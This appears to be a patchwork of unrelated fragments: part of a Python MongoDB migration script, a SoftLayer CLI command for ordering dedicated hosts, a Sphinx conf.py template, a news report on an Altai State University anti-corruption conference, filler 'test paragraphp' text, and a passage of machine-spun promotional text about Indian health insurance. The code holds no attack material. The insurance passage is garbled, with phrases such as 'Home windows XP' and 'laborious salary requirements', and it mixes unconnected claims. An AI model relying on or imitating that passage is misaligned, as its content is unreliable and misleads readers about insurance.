        print('Found %d collections on source. Moving...' % len(cols))
        i = 0
        for col in cols:
            i += 1
            if ignore_empty_cols:
                # count_documents() superseded count() in pymongo 3.7.
                if hasattr(db[col], 'count_documents'):
                    non_empty = db[col].count_documents({}) > 0
                else:
                    non_empty = db[col].count() > 0
            else:
                non_empty = True  # migrate regardless of document count
            if non_empty:
                print('Moving collection %s (%d of %d)...' % (col, i, len(cols)))
                try:
                    # renameCollection across databases is a server-side move.
                    client.admin.command(OrderedDict([
                        ('renameCollection', from_db + '.' + col),
                        ('to', to_db + '.' + col),
                        ('dropTarget', drop_target),
                    ]))
                except Exception as e:
                    # Keep going: one failed rename should not abort the rest.
                    print(e)
            else:
                print('Skipping empty collection %s (%d of %d)...' % (col, i, len(cols)))
    # no collections found
    else:
        print('No collections in source database.')
# different servers: round-trip through mongodump/mongorestore
else:
    import subprocess

    print('Migrating between different servers...')
    print('Dumping...')
    out = subprocess.check_output([
        'mongodump',
        '--host', '%s' % from_host,
        '-u', '%s' % from_user,
        '-p', '%s' % from_pass,
        '--authenticationDatabase', '%s' % from_auth_db,
        '--db', '%s' % from_db,
        '--port', '%s' % from_port,
        '-o', '%s' % dump_folder,
    ], stderr=subprocess.STDOUT)
    print('Dump complete.')
    print('Restoring...')
    out = subprocess.check_output([
        'mongorestore',
        '--host', '%s' % to_host,
        '-u', '%s' % to_user,
        '-p', '%s' % to_pass,
        '--authenticationDatabase', '%s' % to_auth_db,
        '--db', '%s' % to_db,
        '--port', '%s' % to_port,
        '--drop', '%s/%s' % (dump_folder, from_db),
    ], stderr=subprocess.STDOUT)
    print('Restore complete.')

print('Migration complete.')
|
this is test paragraphp. this is test paragraphp. this is test paragraphp. this is test paragraphp. this is test paragraphp. this is test paragraphp. this is test paragraphp. this is test paragraphp. this is test paragraphp. this is test paragraphp. this is test paragraphp.
|
"""Order/create a dedicated Host."""
# :license: MIT, see LICENSE for more details.
import click
import SoftLayer
from SoftLayer.CLI import environment
from SoftLayer.CLI import exceptions
from SoftLayer.CLI import formatting
from SoftLayer.CLI import template
@click.command(
    epilog="See 'slcli dedicatedhost create-options' for valid options.")
@click.option('--hostname', '-H',
              help="Host portion of the FQDN",
              required=True,
              prompt=True)
@click.option('--router', '-r',
              help="Router hostname ex. fcr02a.dal13",
              show_default=True)
@click.option('--domain', '-D',
              help="Domain portion of the FQDN",
              required=True,
              prompt=True)
@click.option('--datacenter', '-d', help="Datacenter shortname",
              required=True,
              prompt=True)
@click.option('--flavor', '-f', help="Dedicated Virtual Host flavor",
              required=True,
              prompt=True)
@click.option('--billing',
              type=click.Choice(['hourly', 'monthly']),
              default='hourly',
              show_default=True,
              help="Billing rate")
@click.option('--verify',
              is_flag=True,
              help="Verify dedicatedhost without creating it.")
@click.option('--template', '-t',
              is_eager=True,
              callback=template.TemplateCallback(list_args=['key']),
              help="A template file that defaults the command-line options",
              type=click.Path(exists=True, readable=True, resolve_path=True))
@click.option('--export',
              type=click.Path(writable=True, resolve_path=True),
              help="Exports options to a template file")
@environment.pass_env
def cli(env, **kwargs):
    """Order/create a dedicated host.

    The order is always priced via verify_order() first so the user sees
    the cost; it is only actually placed when neither --verify nor
    --export was given.

    :raises exceptions.ArgumentError: if the verify result does not
        contain exactly one price entry.
    :raises exceptions.CLIAbort: if the user declines the charge prompt.
    """
    mgr = SoftLayer.DedicatedHostManager(env.client)

    order = {
        'hostname': kwargs['hostname'],
        'domain': kwargs['domain'],
        'flavor': kwargs['flavor'],
        'location': kwargs['datacenter'],
        'hourly': kwargs.get('billing') == 'hourly',
    }

    if kwargs['router']:
        order['router'] = kwargs['router']

    # Only place the order when neither --export nor --verify was requested.
    do_create = not (kwargs['export'] or kwargs['verify'])

    # Price (and server-side validate) the order before doing anything else.
    result = mgr.verify_order(**order)

    table = formatting.Table(['Item', 'cost'])
    table.align['Item'] = 'r'
    table.align['cost'] = 'r'

    prices = result['prices']
    if len(prices) != 1:
        raise exceptions.ArgumentError("More than 1 price was found or no "
                                       "prices found")

    # Hourly orders carry 'hourlyRecurringFee'; monthly ones 'recurringFee'.
    if order['hourly']:
        total = float(prices[0].get('hourlyRecurringFee', 0.0))
        table.add_row(['Total hourly cost', "%.2f" % total])
    else:
        total = float(prices[0].get('recurringFee', 0.0))
        table.add_row(['Total monthly cost', "%.2f" % total])

    output = [table]
    output.append(formatting.FormattedItem(
        '',
        ' -- ! Prices reflected here are retail and do not '
        'take account level discounts and are not guaranteed.'))

    if kwargs['export']:
        export_file = kwargs.pop('export')
        template.export_to_template(export_file, kwargs,
                                    exclude=['wait', 'verify'])
        env.fout('Successfully exported options to a template file.')

    if do_create:
        if not env.skip_confirmations and not formatting.confirm(
                "This action will incur charges on your account. "
                "Continue?"):
            raise exceptions.CLIAbort('Aborting dedicated host order.')

        result = mgr.place_order(**order)

        table = formatting.KeyValueTable(['name', 'value'])
        table.align['name'] = 'r'
        table.align['value'] = 'l'
        table.add_row(['id', result['orderId']])
        table.add_row(['created', result['orderDate']])
        output.append(table)

    env.fout(output)
|
Rising middle-class incomes, inflationary stress on healthcare prices and the recognition of state-sponsored healthcare schemes will assist the health insurance coverage enterprise in India contact the Rs 35,000 crore mark by 2014-15, says the ‘India 2011 – Insurance coverage Trade Report’ launched by India Insure Threat Administration and Brokerage Providers. Don’t submit the claim documents at any native ICICI Lombard GIC Ltd. Along with coverage advantages of your coverage, you additionally get entry to a web based chat with a doctor, free health examine-ups and e-consultations to help you keep match and healthy. This allows you to avail well timed medical companies with out worrying concerning the funds, at any of our 4500+ community hospitals.
I’ll definitely be recommending ICICI Lombard personally to anyone on the lookout for well being insurance coverage. Study about the changing world of plans, premiums and advantages so you may make decisions that make sense for you and your loved ones. Add-on cowl for Outpatient Therapy, Wellness and Preventive Healthcare, and Maternity Profit.
There are laborious salary requirements to affix the personal insurance coverage as a result of it’s getting dearer superior in years. The waiting interval for maternity cowl is 3 years. Expenses arising from HIV or AIDS and associated illnesses, use or misuse of liquor, intoxicating substances or medication as well as intentional self-harm.
The advantages paid out for these conditions would create stress on premiums for all of the fund’s members, inflicting some to drop their membership, which would result in additional rises in premiums, and a vicious cycle of higher premiums-leaving members would ensue.
Nonetheless, these new features aren’t compatible with Home windows XP working Service Pack 1 or Service Pack 2. Secondly, since 2000, the government now provides health care to those who aren’t covered by a compulsory regime (those who have by no means worked and who are not students, meaning the very wealthy or the very poor).
|
# -*- coding: utf-8 -*-
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
# implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# Sphinx build configuration for the generated project's documentation.
# The {{ cookiecutter.* }} placeholders are substituted by cookiecutter
# when the project template is rendered; they are not valid values here.
import os
import sys
# If extensions (or modules to document with autodoc) are in another directory,
# add these directories to sys.path here. If the directory is relative to the
# documentation root, use os.path.abspath to make it absolute, like shown here.
#sys.path.insert(0, os.path.abspath('.'))
# Make the project package importable so sphinx.ext.autodoc can find it
# (conf.py lives two levels below the project root, e.g. doc/source/).
sys.path.insert(0, os.path.abspath('../..'))
# -- General configuration ----------------------------------------------------
# Add any Sphinx extension module names here, as strings. They can be
# extensions coming with Sphinx (named 'sphinx.ext.*') or your custom ones.
extensions = ['sphinx.ext.autodoc', 'sphinx.ext.doctest', 'sphinx.ext.coverage', 'sphinx.ext.viewcode', ]
# autodoc generation is a bit aggressive and a nuisance when doing heavy
# text edit cycles.
# execute "export SPHINX_DEBUG=1" in your terminal to disable
# The suffix of source filenames.
source_suffix = '.rst'
# The master toctree document.
master_doc = 'index'
# General information about the project.
project = u'{{ cookiecutter.project_name }}'
copyright = u'{{ cookiecutter.year }}, {{ cookiecutter.author }}'
version = u'{{ cookiecutter.version }}'
# If true, '()' will be appended to :func: etc. cross-reference text.
add_function_parentheses = True
# If true, the current module name will be prepended to all description
# unit titles (such as .. function::).
add_module_names = True
# The name of the Pygments (syntax highlighting) style to use.
pygments_style = 'sphinx'
# -- Options for HTML output --------------------------------------------------
# The theme to use for HTML and HTML Help pages. Major themes that come with
# Sphinx are currently 'default' and 'sphinxdoc'.
# html_theme_path = ["."]
# html_theme = '_theme'
# html_static_path = ['static']
# Output file base name for HTML help builder.
htmlhelp_basename = '%sdoc' % project
# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title, author, documentclass
# [howto/manual]).
latex_documents = [('index', '%s.tex' % project, u'%s Documentation' % project, u'OpenStack Foundation', 'manual'), ]
# Example configuration for intersphinx: refer to the Python standard library.
#intersphinx_mapping = {'http://docs.python.org/': None}
|
On February 20, the opening of the 1st All-Russian Scientific and Practical Conference “The Role of Civil Society in Countering Corruption” took place at Altai State University.
The flagship university of Altai Krai held a scientific-practical conference on the social and sociological aspects of combating corruption for the first time. About 50 representatives of higher educational institutions and public organizations from various regions of the Russian Federation, as well as representatives of Altai Krai Government, who are in charge of this issue, have shown interest in this topic.
Conference participants noted that a significant role in the issue of combating corruption is played by educational and outreach activities, to which great attention should be paid in higher educational institutions. In particular, the sociologists of ASU study issues related to the social mechanisms for the formation of a civil society, the definition of institutional and non-institutional factors influencing the formation and counteraction of corruption.
The conference presented preliminary results of studies conducted by sociologists of ASU in the autumn of 2018, during which 1,200 people and 30 experts aged 18 to 70 years from 14 districts and 4 cities of Altai Krai were surveyed. Scientists were interested not only in the attitude of people towards corruption, but also in how they understand the corruption processes, their active or passive citizenship, etc.
“We conducted a study that assessed the role of various public associations in counteracting corruption: their attitude to this topic, work mechanisms and technologies of counteraction. At the same time, the attitude of the population to various kinds of situations in corruption was considered,” Head of the Department of Psychology of Communications and Psychotechnologies at the Faculty of Sociology of ASU, Professor, Doctor of Sociology Svetlana G. Maksimova said.
It is to be noted that the organizers of the All-Russian Conference included Altai State University, the Faculty of Sociology of Altai State University, Asian Expert and Analytical Center of Altai State University, the Resource Center for Development of Civil Initiatives and Promotion of Integration of Peoples and Cultures in Altai Krai, Altai Regional Public Organization of Psychological and Social Support and Health Care "Positive Development".
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.